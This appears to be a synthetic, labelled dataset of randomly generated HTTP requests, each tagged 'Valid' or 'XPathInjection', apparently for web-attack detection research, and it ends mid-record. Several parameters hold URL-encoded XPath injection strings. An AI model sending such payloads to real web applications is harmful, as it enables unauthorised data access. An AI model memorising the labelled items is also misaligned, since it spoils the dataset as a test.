GET /hnRGniitel5/DelNtyt1eluDrenrepN2/i4VHRINkXautoexecf@6/g1feteni/rdZNWlg/qI7JMF.Y/ttrxhhl/gpassthruRJhmlcju.html?aAhwuN=238%29%28%26%28objectClass%3D89eo%29%28%7C%28sn++%3D+0i%29%28cn%3Deos+++J*%29%29&Loeo=9544558&rs46loucsl=hS%40&oidoh991=6725&en7auedairm=iseicunodeO%27&hD4cLtinhoerdn=7603&seter=IaTfNd&eyncnd0b=ieB&ayttt9txynhnd=onxeofbsu51in+hgqeval&2egonOyieSarfI=nhaf9eih%3Dpyline&il=ngopafUoj&riOnxi6d=nkAdb-oH1b&6mei=6151&vtntoyn=meftlike HTTP/1.0
Host: www.nirlode.be:80
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: macintosh;q=0.9, iso-2022-jp;q=0.1, x-mac-arabic
Accept-Encoding: *
Accept-Language: ites-oakfry;q=0.6
Cache-Control: no-store
Client-ip: 132.55.39.12
Cookie: rh2innatoc=location<;sn=isftHueMz;cnb6Aestl=837
Cookie2: $Version="15"
Date: Tue, 01 Apr 08 23:46:54 GMT
ETag: W/"w@9jvwhO5MuGi9i"
Expect: dv2os
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 29 Nov 04 22:22:39 GMT
If-Unmodified-Since: Tue, 22 Sep 09 17:56:10 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: *
If-Range: *
Max-Forwards: 1436
MIME-Version: 7.8
Pragma: ggn='wI3hn'
Proxy-Authorization: Digest algorithm=pssp
Authorization: Digest realm
Range: 5873-
Referer: /ygshete6/ects.mdb
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 1.1; oI-th; rv:8.0.1) Gecko/14631688
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: deflate
Upgrade: ei1/2.0
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 89253590
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38724
Start - Id: 20168
class: Valid
GET /55n6kC/pKXwherenz_WLbDer.css?Ytmp8NxjP=uan&iehbhed=asamtEnetcatoyat%2Bral&urte6h8o=829&kNhi9oebkdPt8=eatxiMfdr&2siy=3940&QDGg0iM5lY=a3Ne&7CxtermAv6m=aoriso&ddsh=8335 HTTP/1.0
Host: www.luiielueen.de
Connection: close
Accept: */*
Accept-Charset: cp-936, utf-7;q=0.5, x-mac-chinesesimp, iso-8859-6, x-mac-roman;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=39
Client-ip: 45.43.165.63
Cookie: vh=I;rtTstaTt4=ehbacek7gtln6;-EUHJ9lTO=zmninputs
Cookie2: $Version="224"
Date: Sun, 31 Oct 04 08:57:03 GMT
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: Git7ecn
From: eosoO@enstol2ni.de
If-Modified-Since: Tue, 06 Jan 09 20:02:20 CET
If-Unmodified-Since: Fri, 07 Apr 06 22:06:57 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Dec 07 05:21:37 CET
Max-Forwards: 792
MIME-Version: 4.6
Pragma: joweSfA='5Niawy'
Proxy-Authorization: srrnsA krEeR=Tsg3ode
Authorization: Digest username="eliuoo"
Range: 365749-,607-065
Referer: http://www.radrrVT1.be/hedbHo/d0m8ee/iiaantyi/eellrq/a4l1te.cfm
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 5.4; ao-hz; rv:0.3.4) Gecko/77604647
UA-CPU: PowerPC
UA-Disp: 6636,6727,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 297x878
Via: FTP/0.0 26.234.112.57, gNaroE/5.4 www.6un6bt.css:5, HTTP/3.0 www.pjog.htm
Transfer-Encoding: compress
Upgrade: 5to/3.5
Warning: 954 65.131.167.41 "hmcunrisa0nopxeaart" 
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20168
Start - Id: 34226
class: Valid
POST /hcaThntdIfndv0twidt/ayOqiGEu/n9ZY.Zc_xevalpn4H/4ryMCXs6PdL8Zw.htm? HTTP/1.0
Content-Length: 259
Content-Language: E7ohwteD,elWboRsr,Tsl
Content-Encoding: gzip
Content-Location: /jlaury6u/hhrae/WGlasr/vaxiuna.php
Content-MD5: bmVic2VzYTdvZTRiZVdUZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Feb 05 24:47:01 GMT
Last-Modified: Tue, 20 May 08 05:05:26 UTC
Host: www.ahiieySltr.cz
Connection: sssrheno
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.5, deflate, deflate;q=0.7, gzip
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 89.82.249.53
Cookie: iP.Fobject9FUO=&;uecUoNn=440827043;2xp=pFr9;anaoitw=el+t
Cookie2: $Version="29"
Date: Tue, 18 Mar 08 22:49:21 CET
ETag: W/"-ltgcK@wQoM6NaqDW"
Expect: naaFllsd=ootuiez;jvaqfGs3=hsyaicd
From: ntlyi@ntsbrh.org
If-Modified-Since: Fri, 04 Mar 05 14:39:23 UTC
If-Unmodified-Since: Sat, 24 Oct 09 13:55:33 GMT
If-Match: "2DHmlHLPfaRG6Vnx"
If-None-Match: "rF67xGnyRz6w2mna45"
If-Range: Sat, 21 Jan 06 11:45:01 UTC
Max-Forwards: 4106
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: Basic YWVtQTY6b2lyaA==
Range: -4
Referer: /jhetnres/tNascnb2/e1qro/p5pakueb.mdb
TE: chunked
Trailer: From
User-Agent: eMlsref/6.6.9.3
UA-CPU: x86
UA-Disp: 6221,5236,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 219x8250
Via: 2.3 www.tHnxot.html
Transfer-Encoding: identity
Upgrade: eheff/3.3, 6oy/8.9, DfS/8.2, dqosey/2.3
Warning: 739 239.251.202.243 "odbwbvaetEeIeesgo1" "Mon, 03 Sep 07 05:14:16 GMT"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

grnaTttnrsinihn=g7H&nn0trjs6=082&qhlemtwcaA=mAs&hchcediasaIaae=isdcrlauxtermdk&rli=|FE&s8robNak=5510&bd=noih+1s&window.openF1l=7o&c2a=ehnm3sreaopd&UV7havingG_i5k=aeabnstf6h&nms=54835143&oRIrmx=3&n4htdo4alUh=0&t1EwrinAEd=at&eto0qywp8mtuM=ts6ss6tgtpo4trxan4

End - Id: 34226
Start - Id: 48915
class: XPathInjection
GET /ewxeh/lehrebiezycwn/lclt/hwz6AH/dsI_AQSr.msf?GbanywbseHgT=34&a4vuthhcn=ios%27+or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%271ewtEc%27+++%3D+%27&OstQe5jceeeomf=ebqbqCrSy&errrsvteka1e=f5vlV-K3z&YtmNer4ossm=%2Bdrchc&rDPR=zee&noetd=qne8Epuwiiyfr8lhiR&stoeies3oborlbd=6503218181&fqjee2cur5=touots&cR=jlu&wolnsi1ter=1081&sHeNvig=n&D@81-0atT=c9c+5vos1fh&hG=dGWYCC1 HTTP/1.1
Host: www.Bttt7.be
Connection: close
Accept: */*
Accept-Charset: windows-1257, x-mac-hebrew, utf-7
Accept-Encoding: gzip;q=0.9, deflate, gzip;q=0.3, deflate;q=0.6
Accept-Language: pdeuieg6-ao5, rassno8l-aeh;q=0.6, u-s;q=0.9, 7e7ilaEs-getyfwaf, e6Yotr-dcp
Cache-Control: no-store
Client-ip: 33.184.179.137
Cookie: ogmtei5=honVUB;mestzOn1ctyynh=positiongn>eteoNsdx;taseootea5slyi=716;8a=ngLme;r2a8i6EBe=p;eieEeore6=-fecp9gmnmdx0t
Cookie2: $Version="504"
Date: Sat, 13 Oct 07 11:59:21 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: 100-continue
From: nui8@hgERemx.net
If-Modified-Since: Fri, 06 Aug 04 01:19:57 UTC
If-Unmodified-Since: Mon, 08 Jan 07 18:50:19 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: *
Max-Forwards: 2362
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: eavt tn6ctr=enrnic4r
Range: 87-22
Referer: /hdort/d6ni1dtZ.ace
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: eeus7Qhl (iJgZdRpHDt)
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 508x349
Via: 1.8 www.emgf.css, FTP/8.3 www.oyma.shtml, 9.4 169.243.240.192
Transfer-Encoding: deflate
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48915
Start - Id: 3749
class: Valid
GET /zG4Kdu2y/hRBO5z3F_husCf/hheeoa/3copyyuJYbgsound/hlX/sY6Fl8P6wak/gI.nsf?ZvjYEQedz=null&ctoero=necVv8&ttesicitlIrdlf=177762&tezrifdao=3801&EhFesteedot=RiehcfTasay&NugL=7&8twooesS7ct=uand%25rm3&r4Egsouewo=bDservicesx+1ds9SdocumentaI%40%2Fit%5D&thoetairrNsbe=5jxqo&icladfq=0r6%3E&5dnustYtshf=27123&eheehbHRt=dzs HTTP/1.1
Host: 22.152.120.108
Connection: close
Accept: */*;q=0.2
Accept-Charset: big5, iso-2022-jp, iso-8859-1
Accept-Encoding: 
Accept-Language: ub-ti, ldtio29-s4tRfkq;q=0.3, b-au, ttet7nC-de;q=0.3
Cache-Control: max-age=0
Client-ip: 18.145.135.193
Cookie: @GNr=wu0e1kF;oewMoDoeBc=sf;nsiobOoesa2m;higdi=0990067847
Cookie2: $Version="39"
Date: Wed, 04 May 05 22:55:48 UTC
ETag: W/"LDtMPRZa9qNqstK-r2V"
Expect: oIaVvr=noin;e8qi=lCnean
From: cfidsd09@nujp.org
If-Modified-Since: Thu, 18 Jun 09 04:24:39 GMT
If-Unmodified-Since: Sat, 27 Aug 05 17:14:51 CET
If-Match: *
If-None-Match: "RNheQQhoO2eHgov9"
If-Range: Fri, 27 Apr 07 05:54:53 UTC
Max-Forwards: 8
MIME-Version: 2.8
Pragma: apoADsdN=mrge
Proxy-Authorization: Digest realm
Authorization: NTLM cm5zOGViYXN0YXQxb29OdHNzMGV0YW5zdGRyQmd0cmVwdm51bGRGZQ==
Range: -610282,410-9040,-6457
Referer: /le8otEd.swf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.1 (compatible; MSIE 5.3; WinNT; thlh; nNntAos; nasttz)
UA-CPU: StrongARM
UA-Disp: 079,793,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0475x7705
Via: 6.9 58.253.9.62
Transfer-Encoding: deflate
Upgrade: 3ett/0.9, amuefb/1.7, rjo/0.3, ent6/8.0, 6Liroa/6.9
Warning: 789 116.43.37.160 "mdetioiEteRfea" 
X-Forwarded-For: 131.238.144.225
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 3749
Start - Id: 49302
class: XPathInjection
GET /rw/gxml-nSd_/eptu.jpg?horyuEin=0um&ttEMd24nxael9=iTz6SIrxqUf&LGHdjvarvs-HW=s8o3n%3EtMidsnh%2Bfhtpass&csere3=79&Po=272&oiBh2rrT=hwuc&20V0d@0@vZ6k=etctsle%7Ea5no&rEt=Th&gauat5fotdc4=866&heY01GGhl=s%2F2ieuhn%2Fun1eE%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D646%5D+++++or++++%27tclehsb%27+++%3D+%27 HTTP/1.1
Host: 4.21.56.95
Connection: close
Accept: */*;q=0.1
Accept-Charset: hz-gb-2312, iso-8859-6;q=0.1, euc-kr
Accept-Encoding: *;q=0.9
Accept-Language: Thhu-rosl7, baM-arwrin
Cache-Control: max-stale
Client-ip: 249.173.49.26
Cookie: arh=9;uoemerdEB=23684;aa=txmlobjectidl;gyd=h deleteuu;tear8el=8sh
Cookie2: $Version="05"
Date: Fri, 20 Mar 09 23:52:15 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: sw0gce=tfhGnfi;Sfzr
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Jul 04 24:56:24 CET
If-Unmodified-Since: Thu, 28 Jun 07 14:23:20 GMT
If-Match: "eZVfXv@bAQ9L_nCq"
If-None-Match: "2NWGpcldd8lm8Nj"
If-Range: Wed, 13 Jun 07 01:41:23 UTC
Max-Forwards: 29
MIME-Version: 9.1
Pragma: hihd8nu4='Eye'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: http://lUiiay.gov/tH2mbd/4oduld.shtml
TE: chunked
Trailer: Trailer
User-Agent: Mtlhoae (cg3FLT8J7; oH6pKPU)
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49302
Start - Id: 49675
class: XPathInjection
GET /anijyOlsegihz2Ep/w1ADe82jzV4CK_p/gninsNhcRqshmwie/dJ/Sogb/iwOGOUJEe4m6/n@Xg.M_GDinsertLsS/L3fimgs0HPOnph-ZF/e-j/iuzuf7vGMfLq_UWtGxk9/@-Vj@y515cgLY/eton7nfhHnuriHiaieo.php4?dioboot.iniZ3Rc=2393006&eMtoom=auyK1M-R&aae=tNe9i1&fr1seCl=473++++or+++++1%3C++tncat%2FO5unl%2Fe5%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D04%5D++or+512%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: www.pnepf.it
Connection: bsqttl
Accept: text/plain;q=0.8
Accept-Charset: x-mac-arabic;q=0.8
Accept-Encoding: gzip;q=0.0, compress;q=0.0, deflate;q=0.2
Accept-Language: n9ooordf-etIuis, ryvair-o9h;q=0.2, rntu-zawHign, cettel-w;q=0.9
Cache-Control: min-fresh=723
Client-ip: 234.220.252.143
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="861"
Date: Fri, 13 Aug 04 06:47:26 CET
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 17 Jan 08 06:37:38 CET
If-Unmodified-Since: Thu, 19 May 05 19:05:20 UTC
If-Match: *
If-None-Match: "wNUA6tqfUlx57743H"
If-Range: *
Max-Forwards: 85
MIME-Version: 5.9
Pragma: hd='aapisaa'
Proxy-Authorization: fefd 0ae8ehin=q6gL
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: http://www.iaORJbn.net/tesome.fgf
TE: chunked,chunked
Trailer: Range
User-Agent: hNeedsoas6methcshgm
UA-CPU: Sparc
UA-Disp: 6990,614,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: 0.0 161.207.92.251
Transfer-Encoding: compress
Upgrade: uva/6.8
Warning: 381 115.122.86.133 "cnay5hst5e7r" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49675
Start - Id: 9760
class: Valid
GET /pnaUfeo5a/iheWIxcrR9f5YBU/xb/eced/t0aandJautoexec7aopenT-V@M/f@4p2MPVKl/semYHoCv/_1@dT/tV4nuXVW/hj7/m4JAmjto8MjQn9_0Nh/dF.MwI2.pl?bgsoundstyleI_US.6=776&6ede=gmot&aAinput4X0YT=45&eornnut=4&ol9soPghfTh=eo-J&DPe=2uhiBnsbaaimi&stboseMwd=eue%26e&oonea91nt=rr7dS&se=44123982&lEtoa9ziwihcOt=rddzapeap7OemiTh&smgbtnbompatkss=eCin%3BBat&u98eyNow1nrt=f&jTD9-uWtO1=7 HTTP/1.0
Host: 177.205.32.196
Connection: l47sap
Accept: application/*;q=0.6, application/rtf, image/jpeg;q=0.7
Accept-Charset: cp-936;q=0.4, x-mac-hebrew;q=0.6, x-mac-icelandic, iso-2022-kr
Accept-Encoding: deflate;q=0.6, deflate, gzip;q=0.5
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 253.90.150.161
Cookie: 39opireh=e3Ir$;eZtecsintwnt=Kefaeeo;oteVwnttsOn=ddb nn;1sdspdtAmzye=ty;lauTTeo7gses1ur=555;y8yvrqmmrytehi=la
Cookie2: $Version="7"
Date: Sat, 20 Jan 07 13:36:57 CET
ETag: "4fivot.J_rjq4aU"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Mon, 03 Sep 07 03:19:11 CET
If-Unmodified-Since: Sat, 01 Jan 05 02:22:17 CET
If-Match: "EnPGKJySfcKp584_h"
If-None-Match: *
If-Range: *
Max-Forwards: 15
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: Basic ZW5lcm5kOnRlc3Jubw==
Range: -585780,60750-302396,970996-
Referer: /ao7smha/thoimne/4le2.mpg
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: ihoui8fh (fwDa2hWJC; s8NFU0at@; imE_KNJWA; of@TqD; bjz87.T)
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 493x9189
Via: HTTP/8.1 195.143.175.30, HTTP/4.8 www.gmreZr.jpg, 4.1 www.Gtdnn6x.shtml
Transfer-Encoding: deflate
Upgrade: ac6/4.7
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 41911354642877807114
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9760
Start - Id: 22929
class: Valid
GET /36wrOoimqio/nease/eazFFXWN--gvD5qx/.2cs_B/fHbz7e2-oVzMjZvDVn/nfoe/sHpiNGZz/atWzqNL9J/gdcwn/marewdilsc/ohafassr/eNbQQuOYorWNDy.html?wz0d=hoqc%240a9oc%7C&ohi61=oL0dE&aGdbrs7odu=lf%3CRiexmlbiee+io+ HTTP/1.0
Host: www.esnEls0WHt.de
Connection: keep-alive
Accept: image/gif, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l2xxstDw-in;q=0.7
Cache-Control: no-cache
Client-ip: 200.193.13.63
Cookie: eftu=130544005;lwru=54;tEelwi=l@gDG3IM;gct=9632;sinput7htpassdp=)lh;sAmoraot8yrt=535077
Cookie2: $Version="24"
Date: Sun, 25 Apr 10 23:40:33 CET
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: 100-continue
From: sheeev0h@4urQEniSH.be
If-Modified-Since: Mon, 26 Mar 07 02:31:30 CET
If-Unmodified-Since: Sat, 01 Dec 07 06:22:31 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 398
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: Basic aUhybnRhZ3Q6ZWltdWE=
Range: 9849-,026-7220,-544798
Referer: /efwz/hnls/oneer.mp3
TE: trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: rpyhttei/3.8.9
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x1338
Via: 8.8 www.sBahans.jpeg
Transfer-Encoding: oeeS; ekhXAot=SxnhNxh
Upgrade: aHpmg/5.8, 48c/5.3
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22929
Start - Id: 3394
class: Valid
GET /eYrJ/AeWtmpselect.css?neltttnoAm8zutj=%7Ee&HzlaehneirL=%2601eehi%3Dgtuo9us&H2q=5690 HTTP/1.0
Host: www.yhhlmnEdh.fr
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-cyrillic, iso-10646-ucs-2;q=0.0, x-mac-chinesesimp, iso-8859-6;q=0.0
Accept-Encoding: 
Accept-Language: s-st;q=0.6, im-NheRoaht, y-lstaS, m-t2ierar, hrp2tw-mr6ckko;q=0.6
Cache-Control: max-stale=4874
Client-ip: 235.18.83.192
Cookie: aaergrieErko7o=ttan]tnt?window.open;ednoe=enlAcWgse00xeakliq
Cookie2: $Version="4"
Date: Tue, 19 Jun 07 15:50:05 GMT
ETag: W/"tvUBLjhMKWswmvBEOt"
Expect: 100-continue
From: 6gOqlo@tI0ceenh.st
If-Modified-Since: Fri, 09 Jul 04 17:06:18 CET
If-Unmodified-Since: Thu, 04 Sep 08 23:14:36 CET
If-Match: *
If-None-Match: "V4HyZsxjGxPkWEPz"
If-Range: *
Max-Forwards: 3129
MIME-Version: 8.8
Pragma: ydlhimqc='aeW9ekjo'
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: eegi hest=eselren
Range: 163-6091,597027-
Referer: http://www.au6dtais.uk/lltswieT/idodh/teh81t/esiphbg/slosLm.gif
TE: trailers
Trailer: Upgrade
User-Agent: 0Atpt/3.1.7.4.6
UA-CPU: MIPS
UA-Disp: 415,5434,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 571x686
Via: 6.7 44.174.140.18:7, HTTP/2.0 www.do0nero7.gif:7577, goenou/6.3 www.eyniVnhq.html
Transfer-Encoding: compress
Upgrade: iese/4.2, lyaona/9.7, dyz/7.8, rS9r/0.7, entk/4.6
Warning: 300 www.6tf78e.gif "ECeisthegenu0bmdifMi" "Wed, 22 Jun 05 01:38:52 UTC"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 339495405451
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3394
Start - Id: 33663
class: Valid
PUT /iriRV22K/jAX-fBPE/eptgaaTi.css? HTTP/1.0
Content-Length: 253
Content-Language: svlr,ect,igt
Content-Encoding: gzip
Content-Location: http://www.gafgc3n.com/aha9l/esee/if3e8/ntice/danYR.avi
Content-MD5: ZmFFZ2h3c1R0aHFtaGxhZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Feb 05 11:21:39 CET
Last-Modified: Thu, 13 Apr 06 22:32:58 UTC
Host: www.teYt.st:80
Connection: ioevom
Accept: image/gif;q=0.6
Accept-Charset: x-mac-arabic;q=0.0, x-mac-greek, shift_jis, x-mac-hebrew
Accept-Encoding: *
Accept-Language: edMr-slahi, 0-y1htr;q=0.8, t-eefh5e, oyio-frooD;q=0.0
Cache-Control: max-age=019
Client-ip: 113.146.215.236
Cookie: 2ctou=E98sle;hataeSnee=tslissadpgnvoa3s;mceocnHnantofts=oPB-FT7EV3;at=6320536;dews0t=iemees;gJXD=insajttdi
Cookie2: $Version="8"
Date: Fri, 07 Mar 08 06:47:32 UTC
ETag: W/"NzY5F3Hh7ldE_SPuFA"
Expect: 100-continue
From: Utso@nihreoOf.st
If-Modified-Since: Wed, 11 Feb 04 21:12:36 GMT
If-Unmodified-Since: Thu, 17 May 07 11:18:57 CET
If-Match: "cdHet-oA14boKtx29bk"
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 0.1
Pragma: wes0pU=ci0tz
Proxy-Authorization: oeut alhdcdwS=ederee
Authorization: Digest uri=/ibjliiq/lModeb/1seoqiit/rsleh.mpg
Range: 97019-,-6
Referer: /tsss/domlA/nnrd3Mr/ectn/Ziiole.css
TE: deflate;q=0.3,gzip,chunked;q=0.1
Trailer: Connection
User-Agent: avtetDed/8.3.7.9.4
UA-CPU: PowerPC
UA-Disp: 0976,3445,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3257x6651
Via: 1.8 230.254.36.111, 2.1 137.228.209.176:87382
Transfer-Encoding: identity
Upgrade: Zmrps/0.2
Warning: 207 108.67.175.165 "2eeoi" "Sun, 02 Sep 07 12:24:19 GMT"
X-Forwarded-For: 199.124.172.154
X-Serial-Number: 6339975961282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

m2nodedDatN=mniin]%rfel&ntaliomfa4aqu=9125726&ghgnuz5e=3797573&xirgsafacn8tray=2025104&rst53i2taor=kuwL05&tee5iv=jTrqMs&pmtasn=jtq8pn&eu=3oshfX&V-Wwindow.openZcI=mtr&ittntarsvmoo5=t hdl&wnmrdl4ay4Xsaes= 'o"bErreS"vsbIdropt)&RisG6K=2625641336

End - Id: 33663
Start - Id: 30850
class: Valid
GET /hsX4d/n4_nRGcNdsLhkRm7F1M/uools8oSo0taiEdi.asp?erqieDaazhOt=ubjug1fVyCSk&arooyieow=32 HTTP/1.0
Host: 197.37.244.62:80
Connection: close
Accept: audio/basic, application/rtf;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale=24
Client-ip: 229.20.207.25
Cookie: ereee=erl55so<
Cookie2: $Version="2"
Date: Mon, 23 Jan 06 04:16:15 CET
ETag: W/"b5hjKvBvjiMYc1oLi4."
Expect: Pelt=bhiA;tfaIsw
From: uqfre@ho0adaw.st
If-Modified-Since: Tue, 02 May 06 23:20:40 GMT
If-Unmodified-Since: Mon, 12 Sep 05 12:32:51 CET
If-Match: "-3Gs9oIuEvUtYjEk"
If-None-Match: "MQ@7FFlcFs4kXOCn"
If-Range: Thu, 01 Jan 09 01:12:40 UTC
Max-Forwards: 1
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM bXJvbmFqZW5ocnIxZWk0bXRscHVsdW81c2VzY3JVb2Vsb3I=
Authorization: NTLM cGVyYWhUc2k4bG52bnRyZTM2b29yNHh0c2ZhbG50bWU=
Range: 0-9,-164,6789-
Referer: /fiv6Tpvt/aaef/mPss/ISLsR2s.tar.gz
TE: gzip,deflate;q=0.2,gzip
Trailer: Connection
User-Agent: sjXDwmvAZI http://www.3hutnq2.st
UA-CPU: StrongARM
UA-Disp: 072,6639,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1014x4541
Via: 6.9 www.vEdgwnar.jpeg, 6.5 www.osvNlw.shtml
Transfer-Encoding: deflate
Upgrade: tta/7.0, 4eqe/3.0, anE/5.0, icyrc/8.3
Warning: 208 www.2eeeoY.shtml "deaxitre" "Sun, 01 Oct 06 14:56:07 CET"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 5586644742
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30850
Start - Id: 5709
class: Valid
PUT /ee6axoatcmAfnt/etriovj6o/l9SZ6mc/onsareoMbt/9pTB/oyGj@wU-g8jsk/oEsuodctelIlce19a4lo/rl/nWeYIWz3q/iJEkWs-v9qLA.cfm? HTTP/1.0
Content-Length: 246
Content-Language: eohoel,sLwspoi
Content-Encoding: gzip
Content-Location: /fld1ij/asaaneth/18an/neopn.php3
Content-MD5: ZHNib2J1Um41ZG5yb2tkeg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Jul 09 13:27:00 UTC
Last-Modified: Tue, 06 Jul 04 09:13:45 GMT
Host: www.toiqaacmmn.st:71708
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.4, iso-8859-4, utf-8;q=0.1, ks_c_5601-1987;q=0.2, x-mac-icelandic;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: min-fresh=2
Client-ip: 110.24.246.81
Cookie: teNthagyl61y=14892;iiesmod=oeeietse;nabas=dItesb8aegh
Cookie2: $Version="107"
Date: Mon, 20 Nov 06 20:12:11 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Fri, 24 Apr 09 04:11:51 CET
If-Unmodified-Since: Mon, 02 Feb 04 01:45:00 CET
If-Match: *
If-None-Match: "Qoq1w6_UNGcl20zu"
If-Range: "DBeyELXU@qYyGXfEV6"
Max-Forwards: 9
